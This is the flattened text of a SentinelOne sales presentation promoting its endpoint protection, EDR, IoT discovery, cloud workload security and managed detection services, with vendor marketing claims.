SentinelOne Platform · 2021. 3. 9. · S1 Core Endpoint Protection 13 Unifies Prevention,...

SentinelOne Platform

Introduction

©2020 SentinelOne, All Rights Reserved. 4

Deep Visibility

Threat Hunting Threat

Intelligence

Ranger IoT

Discovery & Control

Endpoint

Automated

ActiveEDR

Kubernetes

Containerized

Workloads

Endpoint

AI

Prevention

Nexus

Integrations

CloudFunnel

Data Lake

Streaming

Endpoint

Control

XDR Response

Thanks for joining us today @ Tucana Cloud Event

• About SentinelOne

• Storyline & ActiveEDR

• Core – Control - Complete

• Ranger IoT

• Cloud Workload Security

• Vigilance MDR

• Management Portal Demo

©2020 SentinelOne, All Rights Reserved. 5

Agenda

About SentinelOne

HEADQUARTERSMountain View, CA

GLOBAL ENGINEERINGIsrael, California, Boston, France

GLOBAL DATA CENTERSUS, Frankfurt, Tokyo

AWS GovCloud

Highly Available

Global Ready Architecture Global Service & Support

700+employees

$1.1 billionMarket Valuation

3,500+customers

GLOBAL SUPPORT 24/7 Follow the Sun

VIGILANCE 24/7 MDR team

7©2020 SentinelOne, All Rights Reserved.

Clients Awards & Testing

2019 Forbes AI 50 Ranked

SentinelOne #14 America’s

Most Promising AI Companies

7th fastest growing

company in North America

& the only cybersecurity

company in the top 10.

In progress

Compliance


The Solution

Storyline & ActiveEDR

ActiveEDR Autonomous Behavioral ScoringMachine Speed MitigationEvery Device Tells a Set of StoriesEach Story is Unique ActiveEDR Root Cause AnalysisMachine Speed MitigationModern Attack VelocityModern Attack VelocityMost stories are benign. Some are not.

11

SentinelOne differentiates among 1000’s of stories in real time

Storyline Process TrackingEach Story is a rich set of branching related processes with a context all their ownThe contents and arrangement of every Storyline is weighed in real time

by ActiveEDR in order to identify when code execution has exceeded normal

When evil code remains unchecked the consequences are dire.

This is especially true with high velocity attacks.

Root cause is critical to controlling the source of the problem.SentinelOne tracks the Storyline and ActiveEDR makes the judgement.

The agent responds instantly to mitigate the threat.

SentinelOne unauthorized change reversal, Windows rollback,

Kubernetes container kill remediate attacks

Machine Speed RemediationThe Stories ContinueSurgical removal of out of bounds code keeps users working without delay

©2020 SentinelOne, All Rights Reserved.

The Real Storyline & ActiveEDR


S1 Core Endpoint Protection

13

Unifies Prevention, Detection & Response

✓ Autonomous decisions + Automatic, instant responses

✓ Global Intel + Static AI + Behavioral AI

✓ Full forensics & indicators. Easy pivot to EDR.

Protection Differentiators

✓ Holds up to high velocity & stealthy attacks

✓ Clean, simple management UX provides context

✓ Feature parity across OSes

Core

Control

Complete


S1 Core Endpoint Recovery

14

Painless, fast attack recovery keeps users working

Recovery Differentiators

✓ Easy reversal of unauthorized changes

✓ One-click remediation & Windows rollback

✓ Device isolation & triage

✓ Less re-imaging. Less operational work.

Core

Control

Complete


Firewall for

all OSesBluetooth &

BLE Control

Full Remote

Shell for all OSes

USB Device

Control

S1 Control

15

Adds security suite features to further support

agent consolidation

Core

Control

Complete


Unpatched

Apps

S1 Complete EDR

16

Adds Deep Visibility™ Endpoint Detect & Respond

EDR Differentiators

✓ Combines enterprise features + ease-of-use

✓ Deeply coupled with Prevention enforcement

✓ MITRE ATT&CK™ technique searching

✓ ActiveEDR™ mark entire story as threat

✓ Built for massive data retention, scale, performance

Core

Control

Complete


ActiveEDR™

Code Analysis

AI Dynamic Behavioral Models

Real Time File

Analysis

AI-ML Static File Models

Automated

Remediation

• Kill & Quarantine

• One-click Cleanup

• One-click Rollback

• Disconnect from Network

• Local firewall control

• Anti-tamper

Deep Visibility

Response

• Threat hunting / Watchlists

• Fast queries. Highly scalable.

• Single pivot storyline built

with Storyline™

• Mark entire story as threat

• MITRE ATT&CK™ TTP hunt

DETECTION & RESPONSE

Timeframe = Seconds

Autonomous Agent Operation / Not Cloud Reliant

High levels of feature parity for enterprise: Windows, Mac, Linux, Kubernetes clusters

Timeframe = 30 - 365+ Days

Data context is maintained for

ease of use

REAL TIME PREVENTION REMEDIATION & RECOVERY+

How It Works - Underlying Technology Flow


Ranger IoT

IoT Discovery & Control

19

Ranger IoT

S1 Ranger IoT discovers & fingerprints

every device on your network

✓ Instant Asset Inventory

✓ Eliminate IoT Blind Spots

✓ One-click Rogue Protection

✓ No network changes

Cloud Workload Security

Cloud Security Challenges

21

Too Many Blind Spots

Speed and scale of change renders

manual security methods mootComplex

Manual

Reactive

Expensive

Too Many Bottlenecks

Self-organizing scrum teams working

outside of centralized governance

Too Few Experts

The skills, tools, methods for on-prem

don’t work well for cloud

Too Much Noise

Raw, uncorrelated data streams don’t

help analysts control problems

Too Many Tools

Overlapping functions create

operational difficulties and expense

22

Distributed. Autonomous. Automated.

Endpoint IoT Cloud

Complete Host OS Protection▪ 10 major Linux distributions and 12 years of Windows Server

▪ Cloud-native Kubernetes managed containers / Docker

▪ AI-powered runtime protection and remediation

▪ Application Control

Enterprise-grade EDR▪ Runtime detection and response at VM and container level

▪ Patented Storyline™ accelerates incident response

▪ Fully equipped remote shell

Enterprise Management & Deployment▪ Automated deployment and scalability

▪ ONE multi-cloud, multi-tenant console

Cloud Security Posture Management (1H-2021)

▪ CIS Benchmarks for Workloads and Cloud Services

▪ Cloud Asset Inventory / Compliance Reporting

▪ Visual Investigation / File Integrity Monitoring Reports

Securing Workloads - No Matter Their Location

23

Hybrid Cloud VMs and Containers

Autonomous, consolidated EPP

▪ One agent

▪ Max stability, agility / no kernel modules

EPP functions on-agent

▪ Static AI real-time prevention

▪ Behavioral AI detects fileless attacks

Accelerated Threat Resolution

▪ Storyline™ auto-correlates to MITRE

▪ ActiveEDR™ hunting

▪ Remote forensics via fully capable rsh

▪ Kill, Q, file fetch, network isolate

Automated Application Control

Runtime SecurityLinux VMs

24

▪ Ubuntu

▪ RHEL

▪ CentOS

▪ Amazon AMI 2

▪ Oracle

▪ SUSE Linux Enterprise Server

▪ Fedora

▪ Debian

▪ Virtuozzo

▪ Scientific Linux

Supports 10 Major Linux Distros

https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions/vendor/sentinelone/product/sentinelone-endpoint-protection-platform

http://s1.ai/linux

https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions/vendor/sentinelone/product/sentinelone-endpoint-protection-platform/reviews

Runtime SecurityWindows Server VMs

25

Supports Years of Releases

▪ Windows Server

2019, 2016, 2012 R2, 2012,

2008 R2 SP1

▪ Windows Server Core

2019, 2016, 2012

▪ Windows Storage Server

2016, 2012 R2, 2012

2020 MITRE ATT&CK

▪ Fewest Misses

▪ Most Correlations

▪ Best Data Enrichment

Coverage

Consolidated EPP functions on-agent

▪ One agent

▪ Static AI real-time prevention

▪ Behavioral AI detects fileless attacks

Accelerated Threat Resolution

▪ Storyline™ auto-correlates to MITRE

▪ ActiveEDR™ hunting

▪ Secure remote full PowerShell

▪ Patented 1-Click Remediation & Rollback

Container SecurityKubernetes Sentinel

26

Enterprise-grade EPP+EDR in one

▪ Real-time container protection w/o interference

▪ Runtime protection vs. malware, unknown, and

fileless attacks

▪ ActiveEDR™ visibility & hunting inside containers

▪ Kill and quarantine threats, let k8s respawn

affected containers

▪ Full remote shell into pods

Automated Application Control

▪ No allow lists or ML training required

Consolidated EPP functions on-agent

▪ 1 agent per worker node

▪ No pod instrumentation

▪ Auto-deploy via HELM; auto-scale as daemonset

Storyline™

Connects the Dots Automatically

• Distributed intelligence drives high-

velocity, instantaneous protection

• Patented, real-time, machine-built context

across all major OSes & cloud workloads

• Long time horizon EDR data retention for

proactive custom queries, MITRE

technique hunting, IR, or any EDR activity

• 1-Click recovery & response reverses

unauthorized changes across the fleet

Cloud Metadata within S1 Console

Ex: EC2 Instance deployed

as an EKS worker node.

Review VM and K8s metadata tags

▪ IDs for machine image, VPC, and more

▪ K8s cluster name, worker node name, labels

Group instances according to tags...

▪ account ID

▪ AMI ID

▪ etc.

...and manage groups

▪ apply different policies

▪ monitor resource usage

© 2020 SentinelOne. All Rights Reserved. 28

Immutable Cloud Workloads

▪ Any executable running in the app is in

the image

▪ Runtime security depends upon

immutability

Application Control Engine

▪ Detects any foreign processes which

impair the immutable state of the

workload

Workloads Protected at Onset

▪ NO pre-deployment scanning needed

▪ NO ML training period needed

▪ NO allow list maintenance needed

Application Control

App Control

for Containers

▪ AVAILABLE NOW

App Control

for VMs

▪ COMING SOON– Linux VMs Windows

Servers

© 2020 SentinelOne. All Rights Reserved. 29

Available with Control and Complete

Misconfigured IaaS services remain #1 cause of

cloud security failures

CIS Benchmarks represent gold standard for

configuration security

CIS Benchmarks

30

31

97% WOULD RECOMMEND S1

Highest rated

EDR vendor in

Voice of the

Customer report

for EDR”

May 2020

“

CUSTOMERS ARE OUR #1

Customer Satisfaction

(CSAT) is ~97%

97%

Net Promoter Score in the

“great” to “excellent” range

Excellent

Customer Case Studies

32

Securing Cloud Workloads at Scale

K8s Agent

Linux Agent

▪ Thousands of user endpoints...

▪ ...Hundreds of Linux VMs

▪ Intuitive hybrid cloud mgmt, no additional headcount

One

Console

▪ Accelerating k8s, 100’s Linux builds daily

▪ Auto-deploy, scale K8s Sentinel

▪ GO FAST and SECURE

Max

Agility

▪ Info Services Enterprise needed to secure cloud VMs and EKS

▪ EZ deploy: ~1k / couple hours

▪ No kernel modules, max stability

Cloud

Runtime

Summary

33

Distributed IntelligenceScales people with edge to cloud AI

Purpose-Built for EnterprisesOffers deep capabilities for demanding Teams

Simplified ExperienceConsolidates controls to reduce complexity

Fast Threat ResolutionAccelerates recovery to real time

Vigilance MDR

SOC Augmentation

Service

Vigilance extends your in-house SOC expertise and

provides a second set of eyes.

35

24/7 Global

Coverage

Human Element

Human Service

Peace of

Mind

Fewer Alerts

More Context


Thank You

Date post:	26-Mar-2021
Category:	Documents
Upload:	others
View:	3 times
Download:	0 times

SentinelOne Platform · 2021. 3. 9. · S1 Core Endpoint Protection 13 Unifies Prevention,...

Documents